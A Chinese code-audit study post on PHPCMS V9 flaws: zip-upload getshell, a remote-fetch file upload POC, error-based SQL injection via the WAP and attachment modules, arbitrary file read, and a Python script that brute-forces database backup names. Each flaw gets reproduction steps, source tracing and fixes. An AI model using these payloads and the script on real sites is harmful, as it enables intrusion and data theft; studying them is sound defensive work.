PHPCMS预备知识
PHPCMS是采用MVC设计模式开发,基于模块和操作的方式进行访问,采用单一入口模式进行项目部署和访问,无论访问任何一个模块或者功能,只有一个统一的入口。
参数名称 | 描述 | 位置 | 备注 |
---|
m | 模型/模块名称 | phpcms/modules中模块目录名称 | 必须 | c | 控制器名称 | phpcms/modules/模块/*.php 文件名称 | 必须 | a | 事件名称 | phpcms/modules/模块/*.php 中方法名称 | |
PHPCMSV9.2上传Getshell
漏洞复现
我们搭建好环境直接注册,找到修改头像。
data:image/s3,"s3://crabby-images/60b4c/60b4c9d8ca3b8fe60fc298e46e4139cbfd4fde60" alt=""
我们在本地创建一个zip文件里面包含一个文件夹,一个我们的恶意代码。通过Burp修改掉。
data:image/s3,"s3://crabby-images/ec0c4/ec0c4e4c394de22195fb1cb0424642d4f100d6c6" alt=""
访问phpsso_server/uploadfile/avatar/1/1/1/av/av.php ?其中1是我们的uid
data:image/s3,"s3://crabby-images/681b6/681b6036529ff3734e87c936a60b4e16f84bb98f" alt=""
漏洞分析
重复以上步骤。通过burp我们找到上传事件,我们直接去代码定位这个函数。
data:image/s3,"s3://crabby-images/63b5a/63b5aa82985ee6a656240f24d88cc36a05860310" alt=""
然后去代码找到函数直接断点调试
data:image/s3,"s3://crabby-images/f74e4/f74e4b2a055d5ef5dda7bce3d9259fd4f58359c1" alt=""
根据用户UID创建文件夹,防止用户多了文件夹重复创建了两次,然后检测目录创建,没有就创建一次,否则跳过。
data:image/s3,"s3://crabby-images/616a8/616a8e3d5c1a679aa6e3950e29cbeb1d2211b8ad" alt=""
根据uid重命名我们的压缩包文件
data:image/s3,"s3://crabby-images/8f691/8f69156a3ebcc07fa1a3bd0c475657bacdea5e98" alt=""
压缩包的文件就是我们上传的压缩包文件
data:image/s3,"s3://crabby-images/ed1ac/ed1acc5a72b8d465ed9a18a6a97ba950d9f02baf" alt=""
之后进行解压缩文件
data:image/s3,"s3://crabby-images/7d7e7/7d7e75387bb858cb12124047072ed1f6eb5ce487" alt=""
之后进入dir中循环判断文件安全,删除压缩包和非jpg图片
data:image/s3,"s3://crabby-images/554e8/554e8fb28e4448f31461964ca7de495328bd1787" alt=""
走到遍历白名单判断文件,排除. (当前目录).. (上级目录)下图删除了压缩包文件
data:image/s3,"s3://crabby-images/53d8c/53d8c7c94bb32cb043c422ec4c1c941de1078774" alt=""
再次循环时$file=av 而av是目录。unlink是不能删除目录的。所以出现异常。
data:image/s3,"s3://crabby-images/c90ce/c90ceeb821eae382bdec1fd880670d535c33d260" alt=""
所以进而我们的恶意文件留在了服务器里面。这就是为什么上面利用的压缩包里的恶意代码文件需要放在目录下
漏洞修复
不使用zip压缩包处理图片文件。因为后端需要处理特别多的数据。
PHPCMSV9.6.0任意文件上传漏洞
漏洞复现
先注册然后抓包
data:image/s3,"s3://crabby-images/a86ac/a86acbdbe0e8743fee9747730f60e2b10de84bcb" alt=""
其中要准备一个远程的服务器下的恶意代码
data:image/s3,"s3://crabby-images/afe32/afe32019c7ed4cf15294c208ff9da6ef83ea7921" alt=""
准备我们的POC如下
siteid=1&modelid=11&username=123456&password=123456&email=12345@qq.com&info[content]=<img src=http://192.168.0.100/phpinfo.txt?.php#.jpg>&dosubmit=1&protocol=
然后修改放包会报一个错误,会返回我们的URL路径
data:image/s3,"s3://crabby-images/5b0c8/5b0c8f946e17e5e511d5aba4d15d76ed00ef77ac" alt=""
data:image/s3,"s3://crabby-images/fae3f/fae3f5fb015b1a28e30af38928c023dc5fa9ca7b" alt=""
漏洞分析
我们直接找到刚刚我们的包,他是在index.php 进入member 模块中的index 文件里面有一个register 函数
data:image/s3,"s3://crabby-images/23aa2/23aa2afdb19c414dcf83d0575f626cbaf6fc3605" alt=""
我们现在打开我们的代码定位函数,路径如下
data:image/s3,"s3://crabby-images/e0421/e042141239338bf34a675ee05507d80724c2eedb" alt=""
为了更好的理解POC的巧妙。我们正常注册一次然后用POC注册一次分析
data:image/s3,"s3://crabby-images/50c2f/50c2f3482dbf3f9d037b7ad9e60eaf9ded9da358" alt=""
前面就是一堆信息的验证作用不大,我们继续跟踪到130行
if($member_setting['choosemodel']) {
require_once CACHE_MODEL_PATH.'member_input.class.php';
require_once CACHE_MODEL_PATH.'member_update.class.php';
$member_input = new member_input($userinfo['modelid']);
$_POST['info'] = array_map('new_html_special_chars',$_POST['info']);
$user_model_info = $member_input->get($_POST['info']); //重点 }
在这里我们看见$_POST['info'] 使用了member_input 类中的get 方法我们跟踪进去。
data:image/s3,"s3://crabby-images/d1098/d109811447762d8b93b7c5bbc8ff4540a9ea2ba2" alt=""
走到47行获取了datatime 函数,this->fields 是一个动态函数对应的一张表根据modelid 来确定的formytpe 。如下图
【也可以跟进去一步步来,微信搜索黑白天的文章。有详细解释,建议自己跟一遍】
data:image/s3,"s3://crabby-images/e3678/e367830303645085f570370251220b29f6b2a238" alt=""
data:image/s3,"s3://crabby-images/7cd1a/7cd1a92ce49c67c5e3981da8b21ad2d7c2e3dae6" alt=""
我那们跟进去datatime 函数 就是做了一校验然后又返回给$value
data:image/s3,"s3://crabby-images/4742c/4742cd40169e1ace6df663306e46ee5bc8d2d740" alt=""
然后就是插入两次数据库,一个插入v9_member 表一个生日日期和用户id插入到v9_member_detail 表中,至此正常流程走完。
data:image/s3,"s3://crabby-images/e3016/e30169cfe915b14530e8ae2bc159be95264f0ab6" alt=""
data:image/s3,"s3://crabby-images/82e49/82e49d8e90679e9055b2bc5b6f45d2fb7531f249" alt=""
接下来我们分析一下POC流程
值得注意的是我们必须保证username email是唯一
然后我们继续定位到130行,发现content 是我们的内容
data:image/s3,"s3://crabby-images/ecc8b/ecc8b11ecad35ba4bf1cb823749e2d16a46361a9" alt=""
经过new_html_special_chars 就是防止XSS 所以实体化
data:image/s3,"s3://crabby-images/77d84/77d84dd8a6de744296bd8d966d08f631c0defd89" alt=""
于是我们变成了下面这样子。继续跟踪get方法同上
data:image/s3,"s3://crabby-images/7f5e7/7f5e713b7cd48cdfe5df8f7a027b1cfdcee2148d" alt=""
这里我们获取的是editor 函数。
data:image/s3,"s3://crabby-images/1c47a/1c47a3027e9435616369404009ad12ae6c178f01" alt=""
在这个函数中我们有一个download 方法
data:image/s3,"s3://crabby-images/d4a9e/d4a9ea8fb31d29244d9baa47db0c146fc6122027" alt=""
我们跟踪download方法,发现以下关键代码
$ext = 'gif|jpg|jpeg|bmp|png'
if(!preg_match_all("/(href|src)=([\"|']?)([^ \"'>]+\.($ext))\\2/i", $string, $matches)) return $value;
这就是为什么我们写info[content]=<img src-http://xxxx/phpinfo.txt?.php#.jpg(符合这个格式,而且加.jpg 的原因)
到155行这里他把我们的$string 值复制给了$matches
$matches [3]刚好是我们的链接,所以真的很巧妙
data:image/s3,"s3://crabby-images/974e5/974e55130c08aef1e1702a087f892e1a255defa2" alt=""
接着我们跟踪fillurl 方法,里面有一串关键代码如下
$pos = strpos($surl,'#');
if($pos>0) $surl = substr($surl,0,$pos);
strpos 定位#,然后使用substr 处理?.php#.jpg ,处理完之后$surl =?.php 继续执行,可以发现返回的url去掉了#后面的内容
data:image/s3,"s3://crabby-images/83018/830189042c1e3733d211ebffb749bf45ad7dbdd3" alt=""
然后获取后缀名。然后通过getname 方法生成时间+三位数的文件名,如果不返回文件地址的url我们也可以进行爆破处理。
data:image/s3,"s3://crabby-images/a4479/a4479c88978afa0deffedfb3090e79e54937fc4a" alt=""
data:image/s3,"s3://crabby-images/8e9ab/8e9ab774d23ad4d680233cd0fe93b233cec1a183" alt=""
此时进行了copy 函数对远程文件下载
data:image/s3,"s3://crabby-images/21d99/21d99207203ba2ebff5fa5cb187825aecce2cf3a" alt=""
这里的$this->upload_func 是copy函数的原因,是因为初始化时赋给的
data:image/s3,"s3://crabby-images/ca76d/ca76dc6c4742a3ab07e50f47816796dfdf6a5deb" alt=""
此时我们的文件已经到我们的本地了
data:image/s3,"s3://crabby-images/f8539/f8539cd85159a8a39918a42e7a3492cd026134f9" alt=""
接着我们来看看写入文件的路劲是如何返回给我们的。上面程序执行完以后,回到了register? 函数中:
继续跟进$this->db->insert($user_model_info); ?发现数据库插入的字段都不一样继续执行就会报错。前台提示的信息一样,没有这个字段当然报错
Message : Unknown column 'content' in 'field list'
data:image/s3,"s3://crabby-images/f3ae8/f3ae8b3e1d8ec1cde450c3534472c46ce18c9913" alt=""
漏洞修复
在phpcms9.6.1中修复了该漏洞,修复方案就是对用fileext 获取到的文件后缀再用黑白名单分别过滤一次
$filename = fileext($file);
if(!preg_match("/($ext)/is",$filename) || in_array($filename, array('php','phtml','php3','php4','jsp','dll','asp','cer','asa','shtml','shtm','aspx','asax','cgi','fcgi','pl'))){
continue;
}
PHPCMSV9.6.0 WAP模块 SQL注入分析
漏洞复现
首先第一步访问
/index.php?m=wap&c=index&siteid=1
data:image/s3,"s3://crabby-images/692bb/692bb2f808860a68a85561613ce3ca054cd48b09" alt=""
把得到的set-cookie 记录下来
第二步以POST方式访问【下面是测试爆user的】就是一个报错注入语句
/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26
并且传参userid_flash 其中的值就是第一步我们得到的set-cookie
userid_flash=72eciDDbmkE3Tr6LjGQhB3H34p3N1xsgWWbi2VNY
data:image/s3,"s3://crabby-images/00dc3/00dc336b39bef76c9615bfbb50e3d77edbab7b01" alt=""
把加密的json 值记录下来
第三步以POST的方式访问
/index.php?m=content&c=down&a_k=第二步得到的Json值
data:image/s3,"s3://crabby-images/b85cd/b85cda252743bd435e902b8d59e4f2aa1f24017b" alt=""
漏洞分析
其实我们就是通过最后一次提交的数据来爆出来的东西。我们就逆向分析。看第三步的URL做了些什么
/index.php?m=content&c=down&a_k=第二步得到的Json值
我们定位到content 模块down 文件中发现并没有a_k 方法
说明是自动执行的那就是init() 和__construct()
__construct() 基本没东西,我们直接下断init
走到14行看到sys_auth 然后他就是一个加密解密的函数,我们这里不分析加密解密只分析功能
data:image/s3,"s3://crabby-images/e8339/e833967009651e8358b41d3cce891576e44254f2" alt=""
经过sys_auth 解密得到
{"aid":1,"src":"&id=%27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&","filename":""}
走到17行发现一个系统函数parse_str ?这个函数用不好容易出现变量覆盖。可以自己查一下
data:image/s3,"s3://crabby-images/d510c/d510cc54d36dade309a450910d7a6aa63dbd5910" alt=""
我们知道用法了就是把$id 给弄出来
然后直接到26行跟踪get_one 函数,发现后面就直接执行语句了。
data:image/s3,"s3://crabby-images/6d60c/6d60c30f264586ec464e14faf158f9dff772b045" alt=""
肯定有人现在好奇那第三步为什么会得到这个值,我们返回到14行
$a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));
我们怎么得到a_k的值,怎么得到的这个规范进行解密,因为他需要('system','auth_key')我们并不知道
所以我们需要知道谁调用了这个函数
我们回到第二步的POC
/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&id=###payload###&m=1&f=haha&modelid=2&catid=7&
userid_flash=Set-Cookie
我们找到attachment 模块下的attachments 文件中的swfupload_json 函数
data:image/s3,"s3://crabby-images/e3b06/e3b06a63890ceb70167d3ffc525318885483258d" alt=""
到src 时有一个safe_replace 函数我们跟进
data:image/s3,"s3://crabby-images/27d69/27d6987cf9e654826cca0b0a158df4384d099b8c" alt=""
发现一个waf所以我们的src为什么要写成%*27的原因,就是为了绕过一次waf
继续到set_cookie 我们跟进去发现set_cookie 调用了sys_auth 这个函数并且进行了ENCODE 刚好我们又可以再前台看见
data:image/s3,"s3://crabby-images/db691/db6915b564afe2bc32122d953be094e655553939" alt=""
至于我们为什么要传入一个POST值,是在__construct 中如果没有这个userid 他会showmessage
data:image/s3,"s3://crabby-images/e94f9/e94f90f8b100ccb0618657e841751017166d5a1e" alt=""
而userid 是17行的关键代码。我们肯定没有userid 嘛所以三元表达式到第三个,他进行解密一次并且userid=1
$this->userid = $_SESSION['userid'] ? $_SESSION['userid'] : (param::get_cookie('_userid') ? param::get_cookie('_userid') : sys_auth($_POST['userid_flash'],'DECODE'));
现在POST值是怎么拿到的呢,回到第一步,访问的URL
/index.php?m=wap&c=index&siteid=1
我们周到wap 下的index 下的siteid ?而siteid 直接就在__construct 函数里面,于是经过一次set_cookie 加密
data:image/s3,"s3://crabby-images/ef0e7/ef0e7cbc3e1062e0b98105ef3cec728b16fdb79f" alt=""
我们现在来顺利一下整个过程
data:image/s3,"s3://crabby-images/2218a/2218a588f6be19cbc352e0b801a6e0f7982156a2" alt=""
修复建议
把$a_k过滤一次,把$id用intval 过滤一次
PHPCMS9.6.1任意文件读取
漏洞复现
步骤同上一个漏洞所以就不截图了
第一步访问把得到的set-cookie 记录下来
/index.php?m=wap&c=index&siteid=1
第二步访问
/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad%3Dx%26i%3D1%26modelid%3D1%26catid%3D1%26d%3D1%26m%3D1%26s%3D./phpcms/base%26f%3D.p%25253chp
同样POST传递值
userid_flash=第一步获取的Set-cookie
第三部访问
/index.php?m=content&c=down&a=init&a_k=第二步获取的set-cookie
data:image/s3,"s3://crabby-images/316cc/316cc9b9a498cfa771993bee9fcb119fd3ae6d25" alt=""
就可以下载我们要下载的文件
漏洞分析
我们还是和wap_SQL注入 那样逆向分析一下
/index.php?m=content&c=down&a=init&a_k=set-cookie
经过解密之后
data:image/s3,"s3://crabby-images/7a0af/7a0af9c3d3e587f26ec4b9414eed4a374d57737c" alt=""
{"aid":1,"src":"pad=x&i=1&modelid=1&catid=1&d=1&m=1&s=.\/phpcms\/base&f=.p%253chp","filename":""}
经过safe_replace 处理之后
"aid":1,"src":"pad=x&i=1&modelid=1&catid=1&d=1&m=1&s=./phpcms/base&f=.p%253chp","filename":""
但是我们关键的是&s和&f没有任何变化
再经过parse_str 处理我们的url会被解码一次
data:image/s3,"s3://crabby-images/5c702/5c702fed5ce93121d80244c9b5209c585fa0e0ba" alt=""
$f现在就是.p%3cphp
data:image/s3,"s3://crabby-images/b0617/b0617d3ddd769467a968e632c2803b575888eda4" alt=""
然后downurl 发生变化我们点击下载到download函数
data:image/s3,"s3://crabby-images/fea59/fea596728df536132989de58ebe0b47a2d3281df" alt=""
经过一次解密再经过parse_str 转码%3c=> <
走到118行因为传递的m=1经过$fileurl 把他拼接起来变成
.\phpcms\base.p<hp
if($m) $fileurl = trim($s).trim($fileurl); //118行代码
然后走到125行进行随机名称生成,126行他又把$fileurl 的<给去掉了
$filename = date('Ymd_his').random(3).'.'.$ext; //125
$fileurl = str_replace(array('<','>'), '',$fileurl); //126
然后就进行一个原始下载。
第二部分和第一部分参考上面wap_sql 注入,原理一样。我们现在梳理一下这个漏洞。
从最下面分析,他过滤了<> 然后到上面php等一些黑名单 那就P<HP就可以
data:image/s3,"s3://crabby-images/f72ff/f72ffa243b30f4e3fa544b8626b6c33e80b9a2aa" alt=""
$fileurl 是通过$s 来的和$f 来的。而$f和$s 是通过构造$a_k 来的,其中就DECODE ?了两次
所以要通过siteid=1 来进行ENCODE 一次。我们为什么要传一个userid_flash
因为attachments 下的析构函数中的userid 不能为空 而我们没登陆所以需要sys_auth($_POST['userid_flash'],DECODE') 解密一下传入的userid_flash 使得userid=1
$this->userid = $_SESSION['userid'] ? $_SESSION['userid'] :(param::get_cookie('_userid') ? param::get_cookie('_userid') :sys_auth($_POST['userid_flash'],'DECODE'));
又经过set_cookie('att_json',$json_str) ;然后又返回到前台set-cookie
最终通过以下方法进行了下载
index.php?m=content&c=down&a=init&a_k=set-cookie
漏洞修复
官方V9.6.2是先过滤<>再进行php等黑名单过滤,我们还是可以继续通过空白字符来进行绕过的 %81-%99间的字符是不会被trim去掉的且在windows中还能正常访问到相应的文件。并且得到auth_key之后还可以进行其他的操作例如SQL注入等
PHPCMSV9暴力猜解数据库
备份路径 \caches\bakup\default\xxxx.sql
而问题出现在哪,我们先看POC。
poc:
/api.php?op=creatimg&txt=1&font=/../../../../caches/bakup/default/s<<.sql
data:image/s3,"s3://crabby-images/c0eed/c0eedfa5a60d3ed76975a489f6b84ff4cdffb33f" alt=""
原因:
windows的FindFirstFile(API)有个特性就是可以把<<当成通配符来用而PHP的opendir(win32readdir.c)就使用了该API。PHP的文件操作函数均调用了opendir,所以file_exists也有此特性。 pwaaov0zodprrm5371pe_db_20210715_1.sql file_exists --- opendir -- FindFirstFile -- << 通配符 file_exists - << 通配符 333xxxx.sql 3<<.sql file_exists(3<<.sql)
因为返回的只不同所以我们可以逐个猜解
附上斗鱼Sec脚本
#!/usr/bin/env python
# coding=utf-8
'''
author: dysec
'''
import urllib2
def check(url):
mark = True
req = urllib2.Request(url)
req.add_header('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')
response = urllib2.urlopen(req)
content = response.read()
if 'Cannot' in content:
mark = False
return mark
def guest(target):
arr = []
num = map(chr, range(48, 58))
alpha = map(chr, range(97, 123))
exploit = '%s/api.php?op=creatimg&txt=dysec&font=/../../../../caches/bakup/default/%s%s<<.sql'
while True:
for char in num:
if check(exploit % (target, ''.join(arr), char)):
arr.append(char)
continue
if len(arr) < 20:
for char in alpha:
if check(exploit % (target, ''.join(arr), char)):
arr.append(char)
continue
elif len(arr) == 20:
arr.append('_db_')
elif len(arr) == 29:
arr.append('_1.sql')
break
if len(arr) < 1:
print '[*]not find!'
return
print '[*]find: %s/caches/bakup/default/%s' % (target, ''.join(arr))
if __name__ == "__main__":
url = 'http://www.x.com'
#test
guest(url)
转载自:PHPCMSV9版本代码审计学习 - 码上快乐 PHPCMSV 版本代码审计学习 学习代码审计,自己简单记录一下。如有错误望师傅斧正。 PHPCMS预备知识 PHPCMS是采用MVC设计模式开发,基于模块和操作的方式进行访问,采用单一入口模式进行项目部署和访问,无论访问任何一个模块或者功能,只有一个统一的入口。 参数名称 描述 位置 备注 m https://www.codeprj.com/blog/e5277d1.html
|